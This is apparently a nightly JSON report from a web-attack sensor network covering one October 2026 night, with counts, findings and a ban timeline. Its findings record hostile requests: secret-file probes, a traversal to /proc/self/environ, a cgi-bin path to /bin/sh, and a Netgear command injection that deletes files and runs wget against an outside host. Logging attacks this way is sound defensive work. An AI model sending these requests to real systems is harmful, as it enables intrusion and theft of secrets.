{
 "night": "2026-10-05",
 "window": {
  "start": "2026-10-04T18:00:00+02:00",
  "end": "2026-10-05T06:00:00+02:00"
 },
 "target": {
  "label": "Johannesburg, ZA",
  "lat": -26.2041,
  "lon": 28.0473
 },
 "generated_at": "2026-10-07T11:35:12Z",
 "totals": {
  "attacks": 3752,
  "edge_attacks": 2344,
  "edge_new_bans": 43,
  "new_bans": 115,
  "requests": 98321,
  "blocked_at_edge": 3087,
  "active_bans": 33,
  "sensors": 4
 },
 "sensors": [
  {
   "id": "edge",
   "kind": "edge",
   "attacks": 2344,
   "new_bans": 43,
   "attacks_24h": 3962,
   "active_bans": 23,
   "categories": {
    "cms-probe": 1190,
    "secret-probe": 1097,
    "traversal": 22,
    "protocol": 17,
    "code-injection": 12
   }
  },
  {
   "id": "web-1",
   "kind": "web",
   "attacks": 236,
   "new_bans": 9,
   "attacks_24h": 601,
   "active_bans": 1,
   "categories": {
    "secret-probe": 199,
    "code-injection": 22,
    "cms-probe": 11,
    "protocol": 2,
    "scanner": 2
   }
  },
  {
   "id": "web-2",
   "kind": "web",
   "attacks": 139,
   "new_bans": 21,
   "attacks_24h": 297,
   "active_bans": 1,
   "categories": {
    "secret-probe": 92,
    "cms-probe": 27,
    "scanner": 9,
    "code-injection": 8,
    "protocol": 3
   }
  },
  {
   "id": "web-3",
   "kind": "web",
   "attacks": 1033,
   "new_bans": 42,
   "attacks_24h": 1849,
   "active_bans": 8,
   "categories": {
    "secret-probe": 444,
    "cms-probe": 252,
    "code-injection": 126,
    "protocol": 123,
    "scanner": 86
   }
  }
 ],
 "categories": {
  "secret-probe": 1832,
  "cms-probe": 1480,
  "code-injection": 168,
  "protocol": 145,
  "scanner": 97,
  "traversal": 22
 },
 "findings": [
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 1022,
   "addresses": 48,
   "sensor": "edge",
   "first": "2026-10-04T18:02:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "34.34.217.140"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 75,
   "addresses": 14,
   "sensor": "edge",
   "first": "2026-10-04T20:18:00+02:00",
   "method": "GET",
   "path": "/wp-config.php.txt",
   "ip": "95.168.180.75"
  },
  {
   "severity": "critical",
   "rule": "Traversal to a system file",
   "rule_id": "BW-TRV-01",
   "type": "path-traversal",
   "requests": 18,
   "addresses": 2,
   "sensor": "edge",
   "first": "2026-10-04T22:27:00+02:00",
   "method": "GET",
   "path": "/[@]fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??",
   "ip": "34.81.122.81"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 12,
   "addresses": 4,
   "sensor": "edge",
   "first": "2026-10-04T19:14:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "187.87.144.234"
  },
  {
   "severity": "high",
   "rule": "Run of missing-page requests",
   "rule_id": "BW-BEH-01",
   "type": "behaviour",
   "requests": 4,
   "addresses": 4,
   "sensor": "edge",
   "first": "2026-10-04T23:37:00+02:00",
   "method": "GET",
   "path": "/config.json",
   "ip": "35.205.88.64"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 189,
   "addresses": 9,
   "sensor": "web-1",
   "first": "2026-10-04T20:14:00+02:00",
   "method": "GET",
   "path": "/.git/config",
   "ip": "34.47.17.196"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 22,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-04T20:47:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "45.78.224.87"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 10,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-05T02:40:00+02:00",
   "method": "GET",
   "path": "/database.sql",
   "ip": "34.62.82.165"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 2,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-04T18:54:00+02:00",
   "method": "GET",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "ip": "20.51.250.231"
  },
  {
   "severity": "medium",
   "rule": "PHP script probe",
   "rule_id": "BW-PHP-01",
   "type": "php-probe",
   "requests": 8,
   "addresses": 2,
   "sensor": "web-1",
   "first": "2026-10-05T02:40:00+02:00",
   "method": "GET",
   "path": "/api/phpinfo.php",
   "ip": "34.62.82.165"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 82,
   "addresses": 10,
   "sensor": "web-2",
   "first": "2026-10-04T19:15:00+02:00",
   "method": "HEAD",
   "path": "/.env",
   "ip": "104.244.74.39"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 10,
   "addresses": 6,
   "sensor": "web-2",
   "first": "2026-10-04T21:17:00+02:00",
   "method": "GET",
   "path": "/storage/logs/laravel.log",
   "ip": "91.148.244.131"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 8,
   "addresses": 3,
   "sensor": "web-2",
   "first": "2026-10-04T23:18:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "89.126.211.166"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 9,
   "addresses": 9,
   "sensor": "web-2",
   "first": "2026-10-04T18:01:00+02:00",
   "method": "GET",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "ip": "134.33.66.210"
  },
  {
   "severity": "medium",
   "rule": "CMS, admin or appliance probe",
   "rule_id": "BW-CMS-01",
   "type": "cms-probe",
   "requests": 15,
   "addresses": 3,
   "sensor": "web-2",
   "first": "2026-10-04T23:00:00+02:00",
   "method": "GET",
   "path": "/wp-login.php",
   "ip": "45.138.12.43"
  },
  {
   "severity": "critical",
   "rule": "Secret or VCS file probe",
   "rule_id": "BW-SEC-01",
   "type": "secret-probe",
   "requests": 407,
   "addresses": 15,
   "sensor": "web-3",
   "first": "2026-10-04T20:46:00+02:00",
   "method": "GET",
   "path": "/.env.local",
   "ip": "20.204.16.15"
  },
  {
   "severity": "critical",
   "rule": "PHP or shell payload",
   "rule_id": "BW-RCE-03",
   "type": "rce-payload",
   "requests": 123,
   "addresses": 19,
   "sensor": "web-3",
   "first": "2026-10-04T18:07:00+02:00",
   "method": "POST",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "ip": "168.228.151.152"
  },
  {
   "severity": "critical",
   "rule": "Credential, state or dump file probe",
   "rule_id": "BW-SEC-02",
   "type": "credential-probe",
   "requests": 37,
   "addresses": 5,
   "sensor": "web-3",
   "first": "2026-10-04T23:59:00+02:00",
   "method": "GET",
   "path": "/database.sql",
   "ip": "45.138.12.22"
  },
  {
   "severity": "critical",
   "rule": "Shell command injection",
   "rule_id": "BW-RCE-02",
   "type": "command-injection",
   "requests": 3,
   "addresses": 2,
   "sensor": "web-3",
   "first": "2026-10-04T23:25:00+02:00",
   "method": "GET",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175.148.158.44:\u2026",
   "ip": "175.148.158.44"
  },
  {
   "severity": "high",
   "rule": "Attack tool user agent",
   "rule_id": "BW-UA-01",
   "type": "attack-tool",
   "requests": 86,
   "addresses": 81,
   "sensor": "web-3",
   "first": "2026-10-04T18:04:00+02:00",
   "method": "GET",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "ip": "40.124.186.184"
  }
 ],
 "events": [
  {
   "t": "2026-10-04T18:01:00+02:00",
   "ip": "134.33.66.210",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T18:02:00+02:00",
   "ip": "34.34.217.140",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T18:02:00+02:00",
   "ip": "34.34.217.140",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T18:04:00+02:00",
   "ip": "40.124.186.184",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T18:07:00+02:00",
   "ip": "168.228.151.152",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T18:07:00+02:00",
   "ip": "168.228.151.152",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T18:10:00+02:00",
   "ip": "216.126.237.47",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T18:11:00+02:00",
   "ip": "34.14.216.183",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T18:19:00+02:00",
   "ip": "49.0.202.115",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T18:48:00+02:00",
   "ip": "185.226.197.69",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T18:54:00+02:00",
   "ip": "20.51.250.231",
   "type": "attack-tool",
   "kind": "finding",
   "severity": "high",
   "path": "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T18:58:00+02:00",
   "ip": "45.153.102.164",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T18:58:00+02:00",
   "ip": "45.78.224.87",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T19:14:00+02:00",
   "ip": "187.87.144.234",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T19:14:00+02:00",
   "ip": "187.87.144.234",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T19:15:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T19:15:00+02:00",
   "ip": "104.244.74.39",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T19:20:00+02:00",
   "ip": "223.83.183.254",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T19:39:00+02:00",
   "ip": "167.99.249.21",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T19:45:00+02:00",
   "ip": "34.22.106.197",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T19:56:00+02:00",
   "ip": "49.0.202.115",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T19:57:00+02:00",
   "ip": "187.108.1.142",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T19:58:00+02:00",
   "ip": "35.234.7.208",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:06:00+02:00",
   "ip": "34.142.253.246",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:12:00+02:00",
   "ip": "45.138.12.16",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:14:00+02:00",
   "ip": "34.47.17.196",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T20:14:00+02:00",
   "ip": "34.47.17.196",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.git/config",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T20:18:00+02:00",
   "ip": "95.168.180.75",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:18:00+02:00",
   "ip": "95.168.180.75",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/wp-config.php.txt",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:46:00+02:00",
   "ip": "20.204.16.15",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T20:46:00+02:00",
   "ip": "20.204.16.15",
   "type": "secret-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/.env.local",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T20:47:00+02:00",
   "ip": "45.78.224.87",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T20:47:00+02:00",
   "ip": "45.78.224.87",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-04T20:49:00+02:00",
   "ip": "136.85.99.221",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T20:55:00+02:00",
   "ip": "209.99.187.10",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T20:57:00+02:00",
   "ip": "8.234.127.199",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:01:00+02:00",
   "ip": "34.31.206.252",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:09:00+02:00",
   "ip": "35.222.122.52",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:17:00+02:00",
   "ip": "91.148.244.131",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:17:00+02:00",
   "ip": "91.148.244.131",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/storage/logs/laravel.log",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:18:00+02:00",
   "ip": "81.171.72.93",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:18:00+02:00",
   "ip": "45.238.235.2",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T21:21:00+02:00",
   "ip": "94.154.43.135",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 4,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:25:00+02:00",
   "ip": "91.148.245.81",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:25:00+02:00",
   "ip": "81.171.74.60",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:36:00+02:00",
   "ip": "81.171.72.135",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T21:39:00+02:00",
   "ip": "34.75.105.13",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:39:00+02:00",
   "ip": "196.189.236.67",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T21:45:00+02:00",
   "ip": "2.56.172.206",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T21:47:00+02:00",
   "ip": "35.225.33.58",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T21:48:00+02:00",
   "ip": "104.211.91.50",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T22:07:00+02:00",
   "ip": "192.3.245.183",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T22:16:00+02:00",
   "ip": "34.182.177.246",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T22:19:00+02:00",
   "ip": "178.128.151.198",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T22:27:00+02:00",
   "ip": "34.81.122.81",
   "type": "path-traversal",
   "kind": "finding",
   "severity": "critical",
   "path": "/[@]fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T22:37:00+02:00",
   "ip": "178.211.139.240",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T22:55:00+02:00",
   "ip": "195.178.110.199",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T22:56:00+02:00",
   "ip": "34.64.237.210",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:00:00+02:00",
   "ip": "45.138.12.43",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:00:00+02:00",
   "ip": "85.204.70.112",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:00:00+02:00",
   "ip": "45.138.12.43",
   "type": "cms-probe",
   "kind": "finding",
   "severity": "medium",
   "path": "/wp-login.php",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:10:00+02:00",
   "ip": "45.138.12.51",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:18:00+02:00",
   "ip": "89.126.211.166",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:18:00+02:00",
   "ip": "89.126.211.166",
   "type": "rce-payload",
   "kind": "finding",
   "severity": "critical",
   "path": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:19:00+02:00",
   "ip": "195.178.110.159",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:25:00+02:00",
   "ip": "175.148.158.44",
   "type": "command-injection",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:25:00+02:00",
   "ip": "175.148.158.44",
   "type": "command-injection",
   "kind": "finding",
   "severity": "critical",
   "path": "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175.148.158.44:\u2026",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:37:00+02:00",
   "ip": "35.205.88.64",
   "type": "behaviour",
   "kind": "finding",
   "severity": "high",
   "path": "/config.json",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:40:00+02:00",
   "ip": "154.217.245.253",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:42:00+02:00",
   "ip": "34.182.177.246",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:43:00+02:00",
   "ip": "71.70.231.156",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:51:00+02:00",
   "ip": "34.65.72.219",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:51:00+02:00",
   "ip": "34.186.110.67",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-04T23:56:00+02:00",
   "ip": "185.19.40.244",
   "type": "cms-probe",
   "kind": "ban",
   "offence": 2,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-04T23:59:00+02:00",
   "ip": "45.138.12.22",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-04T23:59:00+02:00",
   "ip": "45.138.12.22",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/database.sql",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:14:00+02:00",
   "ip": "187.17.228.218",
   "type": "php-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:24:00+02:00",
   "ip": "34.50.26.28",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T00:31:00+02:00",
   "ip": "144.225.6.184",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:33:00+02:00",
   "ip": "186.182.105.49",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T00:38:00+02:00",
   "ip": "34.100.153.150",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:39:00+02:00",
   "ip": "34.140.132.132",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T00:43:00+02:00",
   "ip": "34.187.18.72",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T00:44:00+02:00",
   "ip": "20.249.5.100",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T00:44:00+02:00",
   "ip": "223.83.183.254",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:49:00+02:00",
   "ip": "34.100.153.150",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T00:51:00+02:00",
   "ip": "81.0.221.48",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T00:56:00+02:00",
   "ip": "45.138.12.26",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T00:57:00+02:00",
   "ip": "146.190.103.103",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T00:57:00+02:00",
   "ip": "206.189.233.36",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:04:00+02:00",
   "ip": "95.173.222.8",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T01:05:00+02:00",
   "ip": "101.42.0.42",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T01:06:00+02:00",
   "ip": "124.158.13.141",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T01:07:00+02:00",
   "ip": "34.39.67.13",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:07:00+02:00",
   "ip": "193.47.62.168",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:07:00+02:00",
   "ip": "34.140.234.80",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T01:12:00+02:00",
   "ip": "34.18.32.39",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T01:18:00+02:00",
   "ip": "45.156.87.131",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:29:00+02:00",
   "ip": "34.32.83.153",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:34:00+02:00",
   "ip": "34.156.22.151",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T01:34:00+02:00",
   "ip": "34.156.22.151",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T01:35:00+02:00",
   "ip": "34.16.151.47",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
   "t": "2026-10-05T01:41:00+02:00",
   "ip": "34.16.151.47",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-2"
  },
  {
   "t": "2026-10-05T01:41:00+02:00",
   "ip": "46.151.182.93",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-05T01:45:00+02:00",
   "ip": "81.0.221.48",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-05T01:57:00+02:00",
   "ip": "45.238.235.2",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "expired",
   "sensor": "edge"
  },
  {
